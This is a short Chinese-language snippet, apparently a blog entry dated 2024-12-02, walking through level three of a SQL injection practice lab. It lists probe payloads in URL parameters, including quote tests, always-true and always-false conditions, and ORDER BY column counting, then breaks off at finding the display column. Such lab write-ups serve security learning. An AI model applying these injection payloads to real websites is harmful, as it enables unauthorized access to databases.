• 2024-12-02SQL注入靶场(第三关)
    1.判断是否存在注入?id=1?id=2?id=1'报错,闭合点为'),初步猜测为字符型2.判断注入类型?id=1'and'1'='1?id=1'and'1'='2注入类型为字符型3.猜字段?id=1')orderby3--+?id=1')orderby4--+有三个字段4.确定回显